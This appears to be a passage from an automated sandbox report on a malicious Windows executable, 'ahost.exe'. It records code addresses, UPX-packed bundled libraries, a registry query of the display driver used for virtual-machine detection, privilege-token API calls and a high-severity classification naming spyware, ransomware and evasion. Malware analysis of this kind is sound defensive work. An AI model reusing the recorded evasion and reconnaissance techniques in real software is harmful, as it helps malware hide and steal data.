              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F920411C0_2_00007FF7F920411C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F21D40_2_00007FF7F91F21D4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F19B40_2_00007FF7F91F19B4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F3A140_2_00007FF7F91F3A14
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F9203C800_2_00007FF7F9203C80
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F2C800_2_00007FF7F91F2C80
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92009380_2_00007FF7F9200938
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92064880_2_00007FF7F9206488
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F9205C700_2_00007FF7F9205C70
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91EA4E40_2_00007FF7F91EA4E4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91EA34B0_2_00007FF7F91EA34B
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F1BC00_2_00007FF7F91F1BC0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F9F100_2_00007FF7F91F9F10
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F9205EEC0_2_00007FF7F9205EEC
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91EAD1D0_2_00007FF7F91EAD1D
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F1DC40_2_00007FF7F91F1DC4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F5DA00_2_00007FF7F91F5DA0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F36100_2_00007FF7F91F3610
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91FE5E00_2_00007FF7F91FE5E0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91E98700_2_00007FF7F91E9870
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92018E40_2_00007FF7F92018E4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91FDF600_2_00007FF7F91FDF60
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F1FD00_2_00007FF7F91F1FD0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92097980_2_00007FF7F9209798
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F17B00_2_00007FF7F91F17B0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91F88040_2_00007FF7F91F8804
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F92069D42_2_00007FF7F92069D4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E10002_2_00007FF7F91E1000
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91FDACC2_2_00007FF7F91FDACC
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F92009382_2_00007FF7F9200938
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F81542_2_00007FF7F91F8154
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F920411C2_2_00007FF7F920411C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F21D42_2_00007FF7F91F21D4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F19B42_2_00007FF7F91F19B4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F3A142_2_00007FF7F91F3A14
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F9203C802_2_00007FF7F9203C80
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F2C802_2_00007FF7F91F2C80
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F92009382_2_00007FF7F9200938
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F92064882_2_00007FF7F9206488
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F9205C702_2_00007FF7F9205C70
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91EA4E42_2_00007FF7F91EA4E4
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91EA34B2_2_00007FF7F91EA34B
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91F1BC02_2_00007FF7F91F1BC0
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91E8BD02_2_00007FF7F91E8BD0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF88509ACC512_2_00007FF88509ACC5
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AAE10104_2_00007FF7CF8AAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88ABA0104_2_00007FF7CF88ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B7B24104_2_00007FF7CF8B7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF890A2C104_2_00007FF7CF890A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF881884104_2_00007FF7CF881884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88B540104_2_00007FF7CF88B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8954C0104_2_00007FF7CF8954C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8882F0104_2_00007FF7CF8882F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF891180104_2_00007FF7CF891180
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E00F0104_2_00007FF7CF8E00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A0104104_2_00007FF7CF8A0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF893030104_2_00007FF7CF893030
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B8040104_2_00007FF7CF8B8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B0074104_2_00007FF7CF8B0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AC05C104_2_00007FF7CF8AC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C4FE8104_2_00007FF7CF8C4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8EDFD8104_2_00007FF7CF8EDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BC00C104_2_00007FF7CF8BC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B5F4C104_2_00007FF7CF8B5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8EAF90104_2_00007FF7CF8EAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8CEEA4104_2_00007FF7CF8CEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BAF0C104_2_00007FF7CF8BAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF889EFC104_2_00007FF7CF889EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8CAE50104_2_00007FF7CF8CAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8DFE74104_2_00007FF7CF8DFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF898E68104_2_00007FF7CF898E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88CE84104_2_00007FF7CF88CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D1DCC104_2_00007FF7CF8D1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88EE08104_2_00007FF7CF88EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF891E04104_2_00007FF7CF891E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B0D20104_2_00007FF7CF8B0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C9D74104_2_00007FF7CF8C9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D6D0C104_2_00007FF7CF8D6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A9D0C104_2_00007FF7CF8A9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88DD04104_2_00007FF7CF88DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF898C30104_2_00007FF7CF898C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C5C8C104_2_00007FF7CF8C5C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D9B98104_2_00007FF7CF8D9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C4B38104_2_00007FF7CF8C4B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8EAAC0104_2_00007FF7CF8EAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88CB14104_2_00007FF7CF88CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C5A70104_2_00007FF7CF8C5A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BFA6C104_2_00007FF7CF8BFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8849B8104_2_00007FF7CF8849B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C69FD104_2_00007FF7CF8C69FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BD91C104_2_00007FF7CF8BD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AD97C104_2_00007FF7CF8AD97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D18A8104_2_00007FF7CF8D18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B38E8104_2_00007FF7CF8B38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C190C104_2_00007FF7CF8C190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B0904104_2_00007FF7CF8B0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF892890104_2_00007FF7CF892890
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF888884104_2_00007FF7CF888884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8917C8104_2_00007FF7CF8917C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A67E0104_2_00007FF7CF8A67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E86D4104_2_00007FF7CF8E86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8986C4104_2_00007FF7CF8986C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BA710104_2_00007FF7CF8BA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C0710104_2_00007FF7CF8C0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C2700104_2_00007FF7CF8C2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D7660104_2_00007FF7CF8D7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AF5B0104_2_00007FF7CF8AF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF898598104_2_00007FF7CF898598
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8BF59C104_2_00007FF7CF8BF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D260C104_2_00007FF7CF8D260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B65FC104_2_00007FF7CF8B65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88A504104_2_00007FF7CF88A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C5468104_2_00007FF7CF8C5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AD458104_2_00007FF7CF8AD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8AC3E0104_2_00007FF7CF8AC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D832C104_2_00007FF7CF8D832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8B0374104_2_00007FF7CF8B0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF892360104_2_00007FF7CF892360
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C02A4104_2_00007FF7CF8C02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89D2C0104_2_00007FF7CF89D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8842E0104_2_00007FF7CF8842E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D1314104_2_00007FF7CF8D1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89E21C104_2_00007FF7CF89E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF88F24C104_2_00007FF7CF88F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A7244104_2_00007FF7CF8A7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8D2268104_2_00007FF7CF8D2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E41CC104_2_00007FF7CF8E41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C81CC104_2_00007FF7CF8C81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8C2164104_2_00007FF7CF8C2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: String function: 00007FF7CF898444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: String function: 00007FF7CF8C49F4 appears 53 times
              Source: C:\Users\user\Desktop\ahost.exeCode function: String function: 00007FF7F91E2710 appears 96 times
              Source: ahost.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: ahost.exeBinary or memory string: OriginalFilename vs ahost.exe
              Source: ahost.exe, 00000000.00000000.1388991720.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389803499.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389533435.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1392338842.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1390222791.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389434123.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1390498619.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1390004278.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389281652.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1394344097.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1395007827.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1390366596.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1394502538.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389886518.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs ahost.exe
              Source: ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs ahost.exe
              Source: ahost.exeBinary or memory string: OriginalFilename vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1883236674.00007FF8F918C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1881100389.00007FF8E825A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1880819429.00007FF8E8224000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1878093732.00007FF8E72E9000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1882479474.00007FF8F7AA8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1878441091.00007FF8E7323000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1882181540.00007FF8F0D18000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1877630099.00007FF8E7212000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1882788202.00007FF8F832A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1878851631.00007FF8E74AC000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1883016417.00007FF8F8CAC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1880546446.00007FF8E7B05000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1877130678.00007FF8E6C2A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1881798155.00007FF8E8406000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs ahost.exe
              Source: ahost.exe, 00000002.00000002.1881428893.00007FF8E8393000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs ahost.exe
              Source: ahost.exeBinary or memory string: OriginalFilenameComputerDefaults.EXEj% vs ahost.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\ahost.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\ahost.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9926987474437627
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@196/60@4/3
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89CAFC GetLastError,FormatMessageW,104_2_00007FF7CF89CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF89EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,104_2_00007FF7CF89EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,104_2_00007FF7CF8CB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8A3144 GetDiskFreeSpaceExW,104_2_00007FF7CF8A3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
              Source: C:\Users\user\Desktop\ahost.exeMutant created: \Sessions\1\BaseNamedObjects\w
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
